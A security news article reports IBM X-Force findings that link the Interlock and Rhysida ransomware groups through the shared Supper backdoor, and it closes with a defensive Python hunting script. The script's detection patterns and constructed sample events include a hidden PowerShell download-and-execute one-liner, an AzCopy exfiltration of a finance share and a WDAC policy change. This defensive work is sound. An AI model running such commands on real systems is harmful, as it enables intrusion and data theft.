Interlock and Rhysida Ransomware Groups Linked by Shared Supper Backdoor
Interlock and Rhysida ransomware operations appear to share more technical overlap than previously known, according to new research from IBM X-Force. The strongest link is a backdoor called Supper, also known as SocksShell, which has appeared in activity tied to both ransomware ecosystems.
The IBM X-Force research found code similarities across Supper, NodeSnake, InterlockRAT, and the JunkFiction downloader. IBM said the overlap suggests a shared original codebase or common developers, although the exact relationship between the two groups remains unknown.
Interlock has operated since September 2024 and does not appear to run as a typical ransomware-as-a-service operation. Rhysida, by contrast, has been active since at least May 2023 and has been tracked as a ransomware-as-a-service group by government and security researchers.
What IBM Found
IBM’s report places Supper at the center of the connection. The backdoor was observed before NodeSnake and InterlockRAT and was originally found protected by JunkFiction, the same crypter used by Interlock on its own tools.
The overlap does not prove that the two ransomware brands are one operation. It does show that their tooling, crypters, and infection chains share important technical relationships that defenders should track together.
IBM also noted that Interlock and Rhysida each claimed around 80 victims in 2025, with most victims located in the United States. Healthcare, education, and government organizations were among the sectors affected by these operations.
| Group | Known activity | Operating model | Tools and malware highlighted |
|---|---|---|---|
| Interlock | Observed since September 2024 | Not clearly operated as RaaS | NodeSnake, InterlockRAT, JunkFiction, Supper, Interlock ransomware |
| Rhysida | Observed since at least May 2023 | Ransomware-as-a-service | Supper, Broomstick, Endico downloader, Tomb crypter, Rhysida ransomware |
| Shared overlap | Seen across multiple incidents | Relationship unclear | Supper backdoor, similar code structures, related crypter use, overlapping malware behavior |
Supper Backdoor Creates the Strongest Link
Supper is a remote access backdoor that can maintain persistence, create encrypted tunnels, and execute remote shell commands. IBM said its behavior closely mirrors capabilities found in InterlockRAT.
The analysis of Supper and related malware found nearly identical command structures, similar control-server registration formats, and the same self-deletion method across some samples.
That self-deletion technique is especially notable. IBM found that an embedded DLL used by older Supper versions to delete itself from disk also appeared inside the Interlock ransomware binary.
Earlier Research Already Pointed to a Rhysida Connection
Cisco Talos previously linked Interlock to Rhysida with low confidence. In its Interlock ransomware analysis, Talos said Interlock may have emerged from Rhysida operators or developers based on similarities in tactics, tools, procedures, and ransomware binaries.
Talos also found overlaps in file and folder exclusion logic, shared use of tools such as AnyDesk and PuTTY, and the use of AzCopy for data exfiltration. These findings did not prove common ownership, but they supported the idea that the two operations sit close together in the ransomware ecosystem.
The latest IBM research adds more technical depth to that earlier assessment by connecting Supper, NodeSnake, InterlockRAT, and JunkFiction through code-level similarities.
How Interlock Infections Usually Start
Interlock attacks often rely on social engineering, fake browser updates, malicious software installers, and ClickFix-style prompts that trick users into running commands. The joint CISA Interlock advisory says the group uses double extortion by exfiltrating data before encrypting systems.
Interlock has also used custom and commodity tools for reconnaissance, credential theft, lateral movement, and remote access. CISA said the group has targeted businesses and critical infrastructure in North America and Europe.
Fortinet’s incident response team also observed Interlock adapting its toolset over time. In a FortiGuard Labs analysis, researchers described Interlock as a smaller, dedicated operation that develops much of its own malware instead of relying entirely on affiliate tooling.
Rhysida Remains a Major Ransomware Threat
Rhysida has been active longer than Interlock and has targeted several high-impact sectors. The CISA Rhysida advisory says the group has focused on education, healthcare, manufacturing, information technology, and government organizations.
Rhysida operators have used external-facing remote services, valid accounts, phishing, and other access methods to compromise networks. Once inside, they typically conduct discovery, steal data, and deploy ransomware to pressure victims through extortion.

IBM’s report connects some Rhysida-linked activity to Vanilla Tempest, a Microsoft-tracked threat cluster that has used Supper in ransomware intrusion chains. That gives defenders another reason to search for Supper-related activity even if the final ransomware payload has not yet appeared.
Why Shared Malware Matters for Defenders
Ransomware groups often change names, affiliates, loaders, and infrastructure. Shared malware gives defenders a more durable way to connect activity across campaigns.
When a backdoor like Supper appears in multiple ransomware ecosystems, security teams should treat it as an early warning sign. The same is true for related crypters, downloaders, staging servers, and recurring post-compromise tools.
The Cisco Talos findings and the newer IBM report both point in the same direction: Interlock and Rhysida may be separate brands, but their tooling and development history overlap enough to matter in threat hunting.
Common Tactics and Tools to Watch
- Trojanized installers for popular software such as Microsoft Teams
- Fake browser update pages and ClickFix-style prompts
- JunkFiction downloader and crypter activity
- NodeSnake and InterlockRAT payloads
- Supper or SocksShell backdoor activity
- Use of AzCopy for data exfiltration
- Use of Advanced Port Scanner, AnyDesk, PuTTY, and similar administrative tools
- Unexpected Windows Defender Application Control policy changes
- Suspicious signed executables from unfamiliar publishers
Interlock’s behavior also highlights a wider trend. Ransomware operators increasingly mix custom malware with legitimate administrative tools, signed binaries, and traffic distribution systems that make early detection harder.
The Interlock guidance from CISA recommends defenses such as multifactor authentication, network segmentation, offline backups, patching, and detection for suspicious remote access tools.
What Organizations Should Do Now
Security teams should hunt for Supper, NodeSnake, InterlockRAT, and JunkFiction indicators together rather than treating them as isolated malware families. They should also review logs for fake update infection chains, ClickFix prompts, abnormal PowerShell execution, and unusual use of remote management tools.
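The hunting advice above and the "Common Tactics and Tools to Watch" list stay at the level of named behaviours. The script below is an added example, not code from IBM X-Force, Talos, CISA, Fortinet or any of the vendors cited, that turns those behaviours into rules run over process-creation events. The event format (a dict with parent, image and cmdline) is an assumption modelled loosely on Sysmon Event ID 1 or Security event 4688; the sample events are constructed, and executable names such as advanced_port_scanner.exe and the citool.exe switches are assumptions you should check against your own telemetry.

```python
"""Hunt for Interlock/Rhysida-style post-compromise activity in process-creation
telemetry. Added example; the event schema and tool names below are assumptions."""
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class Rule:
    name: str
    image: re.Pattern      # matched against the process image path
    cmdline: re.Pattern    # matched against the full command line
    parent: Optional[re.Pattern] = None  # optional parent-image constraint


RULES = [
    # ClickFix: the user pastes a one-liner into the Run dialog or a terminal, so
    # explorer.exe is the parent and the shell fetches a remote payload.
    Rule("clickfix_shell_from_explorer",
         re.compile(r"\\(powershell|pwsh|mshta|cmd)\.exe$", re.I),
         re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-expression|iex)\b|mshta\s+https?:", re.I),
         parent=re.compile(r"\\explorer\.exe$", re.I)),
    # Encoded or hidden-window PowerShell anywhere in the process tree.
    Rule("powershell_encoded_or_hidden",
         re.compile(r"\\(powershell|pwsh)\.exe$", re.I),
         re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{40,}|-w(indowstyle)?\s+hidden", re.I)),
    # AzCopy pushing a directory to Azure Blob storage: staging for double extortion.
    Rule("azcopy_to_blob",
         re.compile(r"\\azcopy(\.exe)?$", re.I),
         re.compile(r"\b(copy|sync)\b.*https://[^\s]+\.blob\.core\.windows\.net", re.I)),
    # Legitimate admin tools that recur in these intrusions (names are assumptions).
    Rule("admin_tool_execution",
         re.compile(r"\\(anydesk|putty|plink|advanced_port_scanner)[^\\]*\.exe$", re.I),
         re.compile(r".*")),
    # WDAC tampering: writing into the CiPolicies store or driving citool.exe.
    Rule("wdac_policy_change",
         re.compile(r".*"),
         re.compile(r"CodeIntegrity\\CiPolicies|citool\.exe\s+(--update-policy|--remove-policy)", re.I)),
]


def hunt(events):
    """Return (rule_name, event_id) pairs for every event that matches a rule.
    One event can hit several rules; that is useful context, so it is kept."""
    hits = []
    for ev in events:
        for rule in RULES:
            if rule.parent and not rule.parent.search(ev.get("parent", "")):
                continue
            if rule.image.search(ev["image"]) and rule.cmdline.search(ev["cmdline"]):
                hits.append((rule.name, ev["id"]))
    return hits


# Constructed sample events, not from a real incident.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://update.example.invalid/fix.ps1 | iex"'},
    {"id": 2, "parent": r"C:\Windows\System32\svchost.exe",  # ordinary scripted install
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\deploy\x.ps1"},
    {"id": 3, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\a\Downloads\azcopy.exe",
     "cmdline": r'azcopy.exe copy "C:\Shares\Finance" "https://stgacct.blob.core.windows.net/x?sv=..." --recursive'},
    {"id": 4, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\a\AppData\Local\Temp\AnyDesk.exe",
     "cmdline": "AnyDesk.exe --silent"},
    {"id": 5, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\citool.exe",
     "cmdline": r"citool.exe --update-policy C:\Temp\weak.cip"},
    {"id": 6, "parent": r"C:\Program Files\Git\git-bash.exe",  # benign
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for name, event_id in hunt(SAMPLE_EVENTS):
        print(f"{name}: event {event_id}")
```

Event 1 fires twice (ClickFix parent chain plus hidden window), which is the kind of stacking that should raise a ticket on its own; the two benign-looking events produce nothing. Tune the regexes against a week of your own process telemetry before alerting on them, because AzCopy and AnyDesk are also used legitimately in many environments.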

The Fortinet research also shows why regular threat hunting matters. Interlock intrusions can include multiple stages, changing payloads, and long dwell time before final ransomware deployment.
For Rhysida-related defense, the Rhysida advisory from CISA recommends maintaining offline backups, restricting remote access, enforcing phishing-resistant MFA, segmenting networks, and monitoring for suspicious use of valid accounts.
The main takeaway is simple: Interlock and Rhysida may not be the same operation, but defenders should connect their telemetry. Supper-related activity, shared crypter behavior, and overlapping infection patterns can give organizations earlier warning before ransomware deployment.
FAQ
Are Interlock and Rhysida the same group?
IBM X-Force found strong technical overlaps between Interlock and Rhysida tooling, but it did not confirm that they are the same group. The relationship could involve shared developers, a shared codebase, or controlled access to the same malware.
What is the Supper backdoor?
Supper, also known as SocksShell, is a backdoor that can maintain persistence, create tunnels, and execute remote commands. IBM X-Force found it in activity connected to both the Interlock and Rhysida ransomware ecosystems.
Why does the shared use of Supper matter?
The shared use of Supper matters because it links separate ransomware operations through malware behavior and code similarities. This can help defenders connect campaigns, hunt earlier in the intrusion chain, and detect activity before ransomware is deployed.
How do Interlock attacks usually begin?
Interlock attacks often begin with social engineering, fake software installers, fake browser updates, ClickFix-style prompts, or drive-by downloads. Attackers then use custom malware and legitimate administrative tools to move through the network.
What should companies monitor for?
Companies should monitor for Supper, NodeSnake, InterlockRAT, JunkFiction, suspicious signed installers, abnormal PowerShell execution, unexpected remote access tools, AzCopy data transfers, and unusual changes to security policies or endpoint protections.